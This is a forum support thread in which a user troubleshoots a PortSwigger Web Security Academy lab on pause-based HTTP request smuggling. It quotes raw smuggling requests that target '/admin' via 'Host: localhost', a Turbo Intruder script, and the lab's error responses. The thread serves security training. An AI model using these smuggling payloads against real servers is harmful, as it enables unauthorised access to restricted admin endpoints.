Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Server-side pause-based request smuggling ISSUE

Hamza | Last updated: Jul 03, 2024 10:42AM UTC

I run this POST /resources HTTP/1.1 Host: 0a2200f2043d4f71805fd09600be0071.web-security-academy.net Cookie: session=mAbLimPqmVB5vNGU7notqlDu7ZCsW8O4 Content-Type: application/x-www-form-urlencoded Content-Length: CORRECT connection: keep-alive GET /admin HTTP/1.1 Host: localhost def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=500, pipeline=False ) engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=61000) engine.queue(target.req) def handleResponse(req, interesting): table.add(req) After Launching attack in turbo i got: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff Server: Apache/2.4.52 Keep-Alive: timeout=120 Content-Length: 50 {"error":"Duplicate header names are not allowed"}

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 01:22PM UTC

Hi Hamza, Are you able to provide us with a screenshot of the full request that you have configured in Turbo Intruder alongside the Turbo Intruder script that you are running so that we can see this in its entirety?

Hamza | Last updated: Jul 04, 2024 04:59AM UTC

sure, how i can provide screenshot, or where to upload the screenshot. because there is no option of uploading screenshot

Michelle, PortSwigger Agent | Last updated: Jul 04, 2024 08:02AM UTC

Can you email it to support@portswigger.net and reference this forum post, please?

Hamza | Last updated: Jul 04, 2024 10:58AM UTC

I am running: POST /resources HTTP/1.1 Host: 0a9500d103b3bce3804ce9c5006a0004.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 85 GET /admin/ HTTP/1.1 Host: 0a9500d103b3bce3804ce9c5006a0004.web-security-academy.net I got: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff Server: Apache/2.4.52 Keep-Alive: timeout=120 Content-Length: 50 {"error":"Duplicate header names are not allowed"}

Michelle, PortSwigger Agent | Last updated: Jul 04, 2024 12:55PM UTC

Hi Thanks for sending us an email. We'll take a look through and check the details of the lab and be in touch soon.

Michelle, PortSwigger Agent | Last updated: Jul 05, 2024 08:21AM UTC